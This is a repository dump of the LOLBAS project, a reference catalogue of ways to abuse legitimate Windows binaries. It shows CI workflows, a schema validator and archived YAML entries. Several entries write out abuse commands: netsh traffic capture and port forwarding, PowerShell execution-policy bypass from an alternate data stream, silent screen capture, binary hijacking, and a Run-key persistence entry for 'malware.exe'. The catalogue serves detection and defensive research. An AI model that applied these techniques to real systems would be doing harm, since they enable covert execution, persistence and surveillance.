Full Code of LOLBAS-Project/LOLBAS for AI

master db6da5b0308b cached
401 files
594.4 KB
190.2k tokens
12 symbols
1 requests
Download .txt
Showing preview only (677K chars total). Download the full file or copy to clipboard to get everything.
Repository: LOLBAS-Project/LOLBAS
Branch: master
Commit: db6da5b0308b
Files: 401
Total size: 594.4 KB

Directory structure:
gitextract_55_rj3ap/

├── .gitattributes
├── .github/
│   ├── .yamllint
│   ├── CODEOWNERS
│   ├── workflows/
│   │   ├── gh-pages.yml
│   │   ├── validation.py
│   │   └── yaml-linting.yml
│   └── yaml-lint-reviewdog.yml.bak
├── Archive-Old-Version/
│   ├── LOLUtilz/
│   │   ├── OSBinaries/
│   │   │   ├── Explorer.yml
│   │   │   ├── Netsh.yml
│   │   │   ├── Nltest.yml
│   │   │   ├── Openwith.yml
│   │   │   ├── Powershell.yml
│   │   │   ├── Psr.yml
│   │   │   └── Robocopy.yml
│   │   ├── OtherBinaries/
│   │   │   ├── AcroRd32.yml
│   │   │   ├── Gpup.yml
│   │   │   ├── Nlnotes.yml
│   │   │   ├── Notes.yml
│   │   │   ├── Nvudisp.yml
│   │   │   ├── Nvuhda6.yml
│   │   │   ├── ROCCAT_Swarm.yml
│   │   │   ├── RunCmd_X64.yml
│   │   │   ├── Setup.yml
│   │   │   ├── Upload.yml
│   │   │   ├── Usbinst.yml
│   │   │   ├── VBoxDrvInst.yml
│   │   │   └── aswrundll.yml
│   │   ├── OtherMSBinaries/
│   │   │   └── Winword.yml
│   │   └── OtherScripts/
│   │       └── Testxlst.yml
│   ├── OSBinaries/
│   │   ├── Atbroker.exe.md
│   │   ├── Bash.exe.md
│   │   ├── Bitsadmin.exe.md
│   │   ├── Certutil.exe.md
│   │   ├── Cmdkey.exe.md
│   │   ├── Cmstp.exe.md
│   │   ├── Control.exe.md
│   │   ├── Csc.exe.md
│   │   ├── Cscript.exe.md
│   │   ├── Dfsvc.exe.md
│   │   ├── Diskshadow.exe.md
│   │   ├── Dnscmd.exe.md
│   │   ├── Esentutl.exe.md
│   │   ├── Expand.exe.md
│   │   ├── Explorer.exe.md
│   │   ├── Extexport.exe.md
│   │   ├── Extrac32.exe.md
│   │   ├── Findstr.exe.md
│   │   ├── Forfiles.exe.md
│   │   ├── Gpscript.exe.md
│   │   ├── IEExec.exe.md
│   │   ├── Ie4unit.exe.md
│   │   ├── InfDefaultInstall.exe.md
│   │   ├── InstallUtil.exe.md
│   │   ├── Makecab.exe.md
│   │   ├── Mavinject.exe.md
│   │   ├── Microsoft.Wrokflow.Compiler.xml
│   │   ├── Microsoft.Wrokflow.Compiler.xoml
│   │   ├── Msbuild.exe.md
│   │   ├── Msconfig.exe.md
│   │   ├── Msdt.exe.md
│   │   ├── Msiexec.exe.md
│   │   ├── Netsh.exe.md
│   │   ├── Nltest.exe.md
│   │   ├── Openwith.exe.md
│   │   ├── Payload/
│   │   │   ├── Cmstp.inf
│   │   │   ├── Cmstp_calc.sct
│   │   │   ├── Evil.xbap
│   │   │   ├── Infdefaultinstall.inf
│   │   │   ├── Infdefaultinstall_calc.sct
│   │   │   ├── Msbuild.csproj
│   │   │   ├── Mshta_calc.sct
│   │   │   ├── PCW8E57.xml
│   │   │   ├── Regsvr32_calc.sct
│   │   │   ├── Wmic_calc.xsl
│   │   │   ├── file.rsp
│   │   │   └── mscfgtlc.xml
│   │   ├── Pcalua.exe.md
│   │   ├── Pcwrun.exe.md
│   │   ├── Powershell.exe.md
│   │   ├── PresentationHost.exe.md
│   │   ├── Print.exe.md
│   │   ├── Psr.exe.md
│   │   ├── Regasm.exe.md
│   │   ├── Register-cimprovider.exe.md
│   │   ├── Regsvcs.exe.md
│   │   ├── Regsvr32.exe.md
│   │   ├── Replace.exe.md
│   │   ├── Robocopy.exe.md
│   │   ├── Rpcping.exe.md
│   │   ├── Rundll32.exe.md
│   │   ├── Runonce.exe.md
│   │   ├── Runscripthelper.exe.md
│   │   ├── SC.exe.md
│   │   ├── Scriptrunner.exe.md
│   │   ├── SyncAppvPublishingServer.exe.md
│   │   ├── WMIC.exe.md
│   │   ├── Wab.exe.md
│   │   ├── Wscript.exe.md
│   │   ├── Xwizard.exe.md
│   │   ├── hh.exe.md
│   │   ├── mshta.exe.md
│   │   ├── odbcconf.exe.md
│   │   ├── reg.exe.md
│   │   └── regedit.exe.md
│   ├── OSLibraries/
│   │   ├── Advpack.dll.md
│   │   ├── Ieadvpack.dll.md
│   │   ├── Ieframe.dll.md
│   │   ├── Mshtml.dll.md
│   │   ├── Payload/
│   │   │   ├── Advpack.inf
│   │   │   ├── Advpack_calc.sct
│   │   │   ├── Ieadvpack.inf
│   │   │   └── Ieadvpack_calc.sct
│   │   ├── Pcwutl.dll.md
│   │   ├── Setupapi.dll.md
│   │   ├── Shdocvw.dll.md
│   │   ├── Shell32.dll.md
│   │   ├── Syssetup.dll.md
│   │   ├── Url.dll.md
│   │   └── Zipfldr.dll.md
│   ├── OSScripts/
│   │   ├── CL_Invocation.ps1.md
│   │   ├── CL_Mutexverifiers.ps1.md
│   │   ├── Manage-bde.wsf.md
│   │   ├── Payload/
│   │   │   ├── Pubprn_calc.sct
│   │   │   ├── Slmgr.reg
│   │   │   └── Slmgr_calc.sct
│   │   ├── Pubprn.vbs.md
│   │   ├── Slmgr.vbs.md
│   │   ├── SyncAppvPublishingServer.vbs.md
│   │   ├── Winrm.vbs.md
│   │   └── pester.bat.md
│   ├── OtherBinaries/
│   │   ├── AcroRd32.exe.md
│   │   ├── Gpup.exe.md
│   │   ├── Nlnotes.exe.md
│   │   ├── Notes.exe.md
│   │   ├── Nvudisp.exe.md
│   │   ├── Nvuhda6.exe.md
│   │   ├── ROCCAT_Swarm.exe.md
│   │   ├── Setup.exe.md
│   │   ├── Usbinst.exe.md
│   │   └── VBoxDrvInst.exe.md
│   ├── OtherMSBinaries/
│   │   ├── Appvlp.exe.md
│   │   ├── Bginfo.exe.md
│   │   ├── Cdb.exe.md
│   │   ├── Dxcap.exe.md
│   │   ├── Mftrace.exe.md
│   │   ├── Msdeploy.exe.md
│   │   ├── Payload/
│   │   │   └── Cdb_calc.wds
│   │   ├── SQLToolsPS.exe.md
│   │   ├── Sqldumper.exe.md
│   │   ├── Sqlps.exe.md
│   │   ├── Tracker.exe.md
│   │   ├── csi.exe.md
│   │   ├── dnx.exe.md
│   │   ├── msxsl.exe.md
│   │   ├── rcsi.exe.md
│   │   ├── te.exe.md
│   │   ├── vsjitdebugger.exe.md
│   │   └── winword.exe.md
│   └── OtherScripts/
│       └── testxlst.js.md
├── Backlog.txt
├── CONTRIBUTING.md
├── CategoryList.md
├── LICENSE
├── NOTICE.md
├── README.md
├── YML-Template.yml
└── yml/
    ├── HonorableMentions/
    │   ├── Code.yml
    │   ├── GfxDownloadWrapper.yml
    │   └── PowerShell.yml
    ├── OSBinaries/
    │   ├── Addinutil.yml
    │   ├── AppInstaller.yml
    │   ├── Aspnet_Compiler.yml
    │   ├── At.yml
    │   ├── Atbroker.yml
    │   ├── Bash.yml
    │   ├── Bitsadmin.yml
    │   ├── Certoc.yml
    │   ├── Certreq.yml
    │   ├── Certutil.yml
    │   ├── Change.yml
    │   ├── Cipher.yml
    │   ├── Cmd.yml
    │   ├── Cmdkey.yml
    │   ├── Cmdl32.yml
    │   ├── Cmstp.yml
    │   ├── Colorcpl.yml
    │   ├── ComputerDefaults.yml
    │   ├── ConfigSecurityPolicy.yml
    │   ├── Conhost.yml
    │   ├── Control.yml
    │   ├── Csc.yml
    │   ├── Cscript.yml
    │   ├── CustomShellHost.yml
    │   ├── DataSvcUtil.yml
    │   ├── Desktopimgdownldr.yml
    │   ├── DeviceCredentialDeployment.yml
    │   ├── Dfsvc.yml
    │   ├── Diantz.yml
    │   ├── Diskshadow.yml
    │   ├── Dnscmd.yml
    │   ├── Esentutl.yml
    │   ├── Eudcedit.yml
    │   ├── Eventvwr.yml
    │   ├── Expand.yml
    │   ├── Explorer.yml
    │   ├── Extexport.yml
    │   ├── Extrac32.yml
    │   ├── Findstr.yml
    │   ├── Finger.yml
    │   ├── FltMC.yml
    │   ├── Forfiles.yml
    │   ├── Fsutil.yml
    │   ├── Ftp.yml
    │   ├── Gpscript.yml
    │   ├── Hh.yml
    │   ├── IMEWDBLD.yml
    │   ├── Ie4uinit.yml
    │   ├── Iediagcmd.yml
    │   ├── Ieexec.yml
    │   ├── Ilasm.yml
    │   ├── Infdefaultinstall.yml
    │   ├── Installutil.yml
    │   ├── Iscsicpl.yml
    │   ├── Jsc.yml
    │   ├── Ldifde.yml
    │   ├── Makecab.yml
    │   ├── Mavinject.yml
    │   ├── Microsoft.Workflow.Compiler.yml
    │   ├── Mmc.yml
    │   ├── MpCmdRun.yml
    │   ├── Msbuild.yml
    │   ├── Msconfig.yml
    │   ├── Msdt.yml
    │   ├── Msedge.yml
    │   ├── Mshta.yml
    │   ├── Msiexec.yml
    │   ├── Netsh.yml
    │   ├── Ngen.yml
    │   ├── Odbcconf.yml
    │   ├── OfflineScannerShell.yml
    │   ├── OneDriveStandaloneUpdater.yml
    │   ├── Pcalua.yml
    │   ├── Pcwrun.yml
    │   ├── Pktmon.yml
    │   ├── Pnputil.yml
    │   ├── Presentationhost.yml
    │   ├── Print.yml
    │   ├── PrintBrm.yml
    │   ├── Provlaunch.yml
    │   ├── Psr.yml
    │   ├── Query.yml
    │   ├── Rasautou.yml
    │   ├── Rdrleakdiag.yml
    │   ├── Reg.yml
    │   ├── Regasm.yml
    │   ├── Regedit.yml
    │   ├── Regini.yml
    │   ├── Register-cimprovider.yml
    │   ├── Regsvcs.yml
    │   ├── Regsvr32.yml
    │   ├── Replace.yml
    │   ├── Reset.yml
    │   ├── Rpcping.yml
    │   ├── Rundll32.yml
    │   ├── Runexehelper.yml
    │   ├── Runonce.yml
    │   ├── Runscripthelper.yml
    │   ├── Sc.yml
    │   ├── Schtasks.yml
    │   ├── Scriptrunner.yml
    │   ├── Setres.yml
    │   ├── SettingSyncHost.yml
    │   ├── Sftp.yml
    │   ├── Sigverif.yml
    │   ├── Ssh.yml
    │   ├── Stordiag.yml
    │   ├── Syncappvpublishingserver.yml
    │   ├── Tar.yml
    │   ├── Ttdinject.yml
    │   ├── Tttracer.yml
    │   ├── Unregmp2.yml
    │   ├── Vbc.yml
    │   ├── Verclsid.yml
    │   ├── Wab.yml
    │   ├── Wbadmin.yml
    │   ├── Wbemtest.yml
    │   ├── Winget.yml
    │   ├── Wlrmdr.yml
    │   ├── Wmic.yml
    │   ├── WorkFolders.yml
    │   ├── Wscript.yml
    │   ├── Wsreset.yml
    │   ├── Wuauclt.yml
    │   ├── Xwizard.yml
    │   ├── msedge_proxy.yml
    │   ├── msedgewebview2.yml
    │   ├── odbcad32.yml
    │   ├── write.yml
    │   └── wt.yml
    ├── OSLibraries/
    │   ├── Advpack.yml
    │   ├── Desk.yml
    │   ├── Dfshim.yml
    │   ├── Ieadvpack.yml
    │   ├── Ieframe.yml
    │   ├── Mshtml.yml
    │   ├── Pcwutl.yml
    │   ├── PhotoViewer.yml
    │   ├── Scrobj.yml
    │   ├── Setupapi.yml
    │   ├── Shdocvw.yml
    │   ├── Shell32.yml
    │   ├── Shimgvw.yml
    │   ├── Syssetup.yml
    │   ├── Url.yml
    │   ├── Zipfldr.yml
    │   └── comsvcs.yml
    ├── OSScripts/
    │   ├── CL_LoadAssembly.yml
    │   ├── CL_mutexverifiers.yml
    │   ├── Cl_invocation.yml
    │   ├── Launch-VsDevShell.yml
    │   ├── Manage-bde.yml
    │   ├── Pubprn.yml
    │   ├── Syncappvpublishingserver.yml
    │   ├── UtilityFunctions.yml
    │   ├── Winrm.yml
    │   └── pester.yml
    └── OtherMSBinaries/
        ├── AccCheckConsole.yml
        ├── Adplus.yml
        ├── Agentexecutor.yml
        ├── AppLauncher.yml
        ├── Appcert.yml
        ├── Appvlp.yml
        ├── Bcp.yml
        ├── Bginfo.yml
        ├── Cdb.yml
        ├── Coregen.yml
        ├── Createdump.yml
        ├── Csi.yml
        ├── DefaultPack.yml
        ├── Devinit.yml
        ├── Devtoolslauncher.yml
        ├── Dnx.yml
        ├── Dotnet.yml
        ├── Dsdbutil.yml
        ├── Dtutil.yml
        ├── Dump64.yml
        ├── DumpMinitool.yml
        ├── Dxcap.yml
        ├── ECMangen.yml
        ├── Excel.yml
        ├── Fsi.yml
        ├── FsiAnyCpu.yml
        ├── IntelliTrace.yml
        ├── Logger.yml
        ├── Mftrace.yml
        ├── Microsoft.NodejsTools.PressAnyKey.yml
        ├── Mpiexec.yml
        ├── Msaccess.yml
        ├── Msdeploy.yml
        ├── MsoHtmEd.yml
        ├── Mspub.yml
        ├── Msxsl.yml
        ├── Nmcap.yml
        ├── Ntdsutil.yml
        ├── Ntsd.yml
        ├── OpenConsole.yml
        ├── Pixtool.yml
        ├── Powerpnt.yml
        ├── Procdump.yml
        ├── ProtocolHandler.yml
        ├── Rcsi.yml
        ├── Remote.yml
        ├── Sqldumper.yml
        ├── Sqlps.yml
        ├── Sqltoolsps.yml
        ├── Squirrel.yml
        ├── Te.yml
        ├── Teams.yml
        ├── Testwindowremoteagent.yml
        ├── Tracker.yml
        ├── Update.yml
        ├── VSDiagnostics.yml
        ├── VSIISExeLauncher.yml
        ├── Visio.yml
        ├── VisualUiaVerifyNative.yml
        ├── VsLaunchBrowser.yml
        ├── Vshadow.yml
        ├── Vsjitdebugger.yml
        ├── WFMFormat.yml
        ├── Wfc.yml
        ├── WinDbg.yml
        ├── Winproj.yml
        ├── Winword.yml
        ├── Wsl.yml
        ├── XBootMgr.yml
        ├── XBootMgrSleep.yml
        ├── devtunnels.yml
        ├── vsls-agent.yml
        ├── vstest.console.yml
        ├── winfile.yml
        └── xsd.yml

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitattributes
================================================
*.yml text eol=lf


================================================
FILE: .github/.yamllint
================================================
---
extends: default
yaml-files:
  - '*.yml'
rules:
  new-line-at-end-of-file:
    level: error
  trailing-spaces:
    level: error
  line-length:
    max: 1000
    level: warning
  new-lines:
    level: error
  indentation:
    level: error
  document-start:
    present: true
    level: error


================================================
FILE: .github/CODEOWNERS
================================================
* @LOLBAS-Project/lolbas-team


================================================
FILE: .github/workflows/gh-pages.yml
================================================
---
name: Update LOLBAS-Project.github.io
on:
  workflow_run:
    workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"]
    types: [completed]
    branches: [master]

jobs:
  build:
    runs-on: ubuntu-latest
    if: ${{ github.event.repository.fork == false && github.event.workflow_run.conclusion == 'success' }}
    steps:
      - uses: actions/checkout@v2

      - name: Change .yml to .md
        run: |
          for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
          mv yml/OSBinaries yml/Binaries
          mv yml/OSLibraries yml/Libraries
          mv yml/OSScripts yml/Scripts
          rm -r yml/HonorableMentions

      - name: Deploy to LOLBAS-Project.github.io repo
        uses: peaceiris/actions-gh-pages@v3
        with:
          deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }}
          external_repository: LOLBAS-Project/LOLBAS-Project.github.io
          publish_branch: master
          publish_dir: yml
          destination_dir: _lolbas
          enable_jekyll: true
          keep_files: false
          commit_message: "Applying update "
          user_name: 'github-actions[bot]'
          user_email: 'github-actions[bot]@users.noreply.github.com'


================================================
FILE: .github/workflows/validation.py
================================================
import glob
import os
import sys
from typing import List, Literal, Optional

import yaml
from pydantic import BaseModel, HttpUrl, RootModel, ValidationError, constr, model_validator, field_validator, ConfigDict

# Disable datetime parsing
yaml.SafeLoader.yaml_implicit_resolvers = {k: [r for r in v if r[0] != 'tag:yaml.org,2002:timestamp'] for k, v in yaml.SafeLoader.yaml_implicit_resolvers.items()}


safe_str = constr(pattern=r'^([a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&%~=]|`[a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&<>%\{\}~=]+`|->)+$')


class LolbasModel(BaseModel):
    model_config = ConfigDict(extra="forbid")


class AliasItem(LolbasModel):
    Alias: Optional[str]


class TagItem(RootModel[dict[constr(pattern=r'^[A-Z]'), str]]):
    pass


class CommandItem(LolbasModel):
    Command: str
    Description: safe_str
    Usecase: safe_str
    Category: Literal['ADS', 'AWL Bypass', 'Compile', 'Conceal', 'Copy', 'Credentials', 'Decode', 'Download', 'Dump', 'Encode', 'Execute', 'Reconnaissance', 'Tamper', 'UAC Bypass', 'Upload']
    Privileges: str
    MitreID: constr(pattern=r'^T[0-9]{4}(\.[0-9]{3})?$')
    OperatingSystem: str
    Tags: Optional[List[TagItem]] = None


class FullPathItem(LolbasModel):
    Path: constr(pattern=r'^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)<>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$')


class CodeSampleItem(LolbasModel):
    Code: str


class DetectionItem(LolbasModel):
    IOC: Optional[str] = None
    Sigma: Optional[HttpUrl] = None
    Analysis: Optional[HttpUrl] = None
    Elastic: Optional[HttpUrl] = None
    Splunk: Optional[HttpUrl] = None
    BlockRule: Optional[HttpUrl] = None

    @model_validator(mode="after")
    def validate_exclusive_urls(cls, values):
        url_fields = ['IOC', 'Sigma', 'Analysis', 'Elastic', 'Splunk', 'BlockRule']
        present = [field for field in url_fields if values.__dict__.get(field) is not None]

        if len(present) != 1:
            raise ValueError(f"Exactly one of the following must be provided: {url_fields}.", f"Currently set: {present or 'none'}")

        return values


class ResourceItem(LolbasModel):
    Link: HttpUrl


class AcknowledgementItem(LolbasModel):
    Person: str
    Handle: Optional[constr(pattern=r'^(@(\w){1,15})?$')] = None


class MainModel(LolbasModel):
    Name: str
    Description: safe_str
    Aliases: Optional[List[AliasItem]] = None
    Author: str
    Created: constr(pattern=r'\d{4}-\d{2}-\d{2}')
    Commands: List[CommandItem]
    Full_Path: List[FullPathItem]
    Code_Sample: Optional[List[CodeSampleItem]] = None
    Detection: Optional[List[DetectionItem]] = None
    Resources: Optional[List[ResourceItem]] = None
    Acknowledgement: Optional[List[AcknowledgementItem]] = None


if __name__ == "__main__":
    def escaper(x): return x.replace('%', '%25').replace('\r', '%0D').replace('\n', '%0A')

    yaml_files = glob.glob("yml/**", recursive=True)

    if not yaml_files:
        print("No YAML files found under 'yml/**'.")
        sys.exit(-1)

    has_errors = False
    for file_path in yaml_files:
        if os.path.isfile(file_path) and not file_path.startswith('yml/HonorableMentions/'):
            try:
                with open(file_path, 'r', encoding='utf-8') as f:
                    data = yaml.safe_load(f)
                MainModel(**data)
                print(f"✅ Valid: {file_path}")
            except ValidationError as ve:
                print(f"❌ Validation error in {file_path}:\n{ve}\n")
                for err in ve.errors():
                    # GitHub Actions error format
                    print(err)
                    path = '.'.join([str(x) for x in err.get('loc', [None])])
                    msg = err.get('msg', 'Unknown validation error')
                    print(f"::error file={file_path},line=1,title={escaper(err.get('type') or 'Validation error')}::{escaper(msg)}: {escaper(path)}")
                    has_errors = True
            except Exception as e:
                print(f"⚠️ Error processing {file_path}: {e}\n")
                print(f"::error file={file_path},line=1,title=Processing error::Error processing file: {escaper(e)}")
                has_errors = True

    sys.exit(-1 if has_errors else 0)


================================================
FILE: .github/workflows/yaml-linting.yml
================================================
---
name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
on: [push,pull_request]

jobs:
  lintFiles:
    if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name != github.event.pull_request.base.repo.full_name
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      - name: Check file extensions
        run: |
          files=$(find "$GITHUB_WORKSPACE/yml" -type f -not -name "*.yml");
          if [[ $files ]]; then
            echo "::error::Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder.";
            for i in $files; do echo "::error file=$i,line=1::Unexpected extension"; done
            exit 1;
          fi
          unset files

      - name: Check duplicate file names
        run: |
          files=$(find "$GITHUB_WORKSPACE/yml/OSBinaries" "$GITHUB_WORKSPACE/yml/OtherMSBinaries" -type f -printf '%h %f\n' -iname "*.yml" | sort -t ' ' -k 2,2 -f | uniq -i -f 1 --all-repeated=separate | tr ' ' '/')
          if [[ $files ]]; then
            echo "::error::Files with duplicate filenames detected, please make sure you don't create duplicate entries.";
            for i in $files; do echo "::error file=$i,line=1::Duplicate filename"; done
            exit 1;
          fi
          unset files

      - name: Install python dependencies
        run: pip install yamllint==1.37.1 pydantic==2.11.9

      - name: Lint YAML files
        run: yamllint -c .github/.yamllint yml/**/

      - name: Validate YAML schemas
        run: python3 .github/workflows/validation.py


================================================
FILE: .github/yaml-lint-reviewdog.yml.bak
================================================
---
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
on: [pull_request]

jobs:
  lintFiles:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run yamllint
        uses: reviewdog/action-yamllint@v1
        with:
          level: error
          reporter: github-pr-review # Change reporter.
          yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
      - name: Validate OSBinaries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSBinaries/*.yml
          schema: YML-Schema.yml
      - name: Validate OSLibraries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSLibraries/*.yml
          schema: YML-Schema.yml
      - name: Validate OSScripts YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OSScripts/*.yml
          schema: YML-Schema.yml
      - name: Validate OtherMSBinaries YAML Schema
        uses: cketti/action-pykwalify@v0.3-temp-fix
        with:
          files: yml/OtherMSBinaries/*.yml
          schema: YML-Schema.yml


================================================
FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Explorer.yml
================================================
---
Name: Explorer.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
  - Command: explorer.exe calc.exe
    Description: 'Executes calc.exe as a subprocess of explorer.exe.'
Full_Path:
  - c:\windows\explorer.exe
  - c:\windows\sysWOW64\explorer.exe
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/bohops/status/986984122563391488
Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'

================================================
FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Netsh.yml
================================================
---
Name: Netsh.exe
Description: Execute, Surveillance
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
  - Command: |
          netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
          netsh.exe trace show status
    Description: Capture network traffic on remote file share.
  - Command: netsh.exe add helper C:\Path\file.dll
    Description: Load (execute) NetSh.exe helper DLL file.
  - Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
    Description: Forward traffic from the listening address and proxy to a remote system.
Full_Path:
  - C:\Windows\System32
  - C:\Windows\SysWOW64
Code_Sample: []
Detection: []
Resources:
  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
  - https://attack.mitre.org/wiki/Technique/T1128
  - https://twitter.com/teemuluotio/status/990532938952527873
Acknowledgement:
  - Person: ''
  - Handle: ''

================================================
FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Nltest.yml
================================================
---
Name: Nltest.exe
Description: Credentials
Author: ''
Created: 2018-05-25
Commands:
  - Command: nltest.exe /SERVER:192.168.1.10 /QUERY
    Description: ''
Full_Path:
  - c:\windows\system32\nltest.exe
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/sysopfb/status/986799053668139009
  - https://ss64.com/nt/nltest.html
Acknowledgement:
  - Person: Sysopfb
    Handle: '@sysopfb'


================================================
FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Openwith.yml
================================================
---
Name: Openwith.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Commands:
  - Command: OpenWith.exe /c C:\test.hta
    Description: Opens the target file with the default application.
  - Command: OpenWith.exe /c C:\testing.msi
    Description: Opens the target file with the default application.
Full_Path:
  - c:\windows\system32\Openwith.exe
  - c:\windows\sysWOW64\Openwith.exe
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/harr0ey/status/991670870384021504
Acknowledgement:
  - Person: Matt harr0ey
    Handle: '@harr0ey'

================================================
FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Powershell.yml
================================================
---
Name: Powershell.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Commands:
  - Command: powershell -ep bypass - < c:\temp:ttt
    Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
Full_Path:
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/Moriarty_Meng/status/984380793383370752
Acknowledgement:
  - Person: Moriarty
    Handle: '@Moriarty_Meng'

================================================
FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Psr.yml
================================================
---
Name: Psr.exe
Description: Surveillance
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
  - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
    Description: Capture screenshots of the desktop and save them in the target .ZIP file.
  - Command: psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
    Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
  - Command: psr.exe /stop
    Description: Stop the Problem Step Recorder.
Full_Path:
  - C:\Windows\System32\Psr.exe
  - C:\Windows\SysWOW64\Psr.exe
Code_Sample: []
Detection: []
Resources:
  - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
Acknowledgement:
  - Person: ''
  - Handle: ''


================================================
FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Robocopy.yml
================================================
---
Name: Robocopy.exe
Description: Copy
Author: ''
Created: 2018-05-25
Categories: []
Commands:
  - Command: Robocopy.exe C:\SourceFolder C:\DestFolder
    Description: Copy the entire contents of the SourceFolder to the DestFolder.
  - Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
    Description: Copy the entire contents of the SourceFolder to the DestFolder.
Full_Path:
  - c:\windows\system32\binary.exe
  - c:\windows\sysWOW64\binary.exe
Code_Sample: []
Detection: []
Resources:
  - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
Acknowledgement:
  - Person: ''
  - Handle: ''

================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/AcroRd32.yml
================================================
---
Name: AcroRd32.exe
Description: Execute
Author: ''
Created: 2018-05-25
Commands:
  - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
    Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
Full_Path:
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/pabraeken/status/997997818362155008
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Gpup.yml
================================================
---
Name: Gpup.exe
Description: Execute
Author: ''
Created: 2018-05-25
Commands:
  - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
    Description: Execute another command through gpup.exe (Notepad++ binary).
Full_Path:
  - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe    '
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/pabraeken/status/997892519827558400
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nlnotes.yml
================================================
---
Name: Nlnotes.exe
Description: Execute
Author: ''
Created: 2018-05-25
Commands:
  - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
    Description: Run PowerShell via LotusNotes.
Full_Path:
  - C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
Code_Sample: []
Detection: []
Resources:
  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
  - https://twitter.com/HanseSecure/status/995578436059127808
Acknowledgement:
  - Person: Daniel Bohannon
    Handle: '@danielhbohannon'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Notes.yml
================================================
---
Name: Notes.exe
Description: Execute
Author: ''
Created: 2018-05-25
Commands:
  - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
    Description: Run PowerShell via LotusNotes.
Full_Path:
  - C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
Code_Sample: []
Detection: []
Resources:
  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
  - https://twitter.com/HanseSecure/status/995578436059127808
Acknowledgement:
  - Person: Daniel Bohannon
    Handle: '@danielhbohannon'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
================================================
---
Name: Nvudisp.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: ''
Created: 2018-05-25
Commands:
  - Command: Nvudisp.exe System calc.exe
    Description: Execute calc.exe as a subprocess.
  - Command: Nvudisp.exe Copy test.txt,test-2.txt
    Description: Copy fila A to file B.
  - Command: Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
    Description: Add/Edit a Registry key value.
  - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"
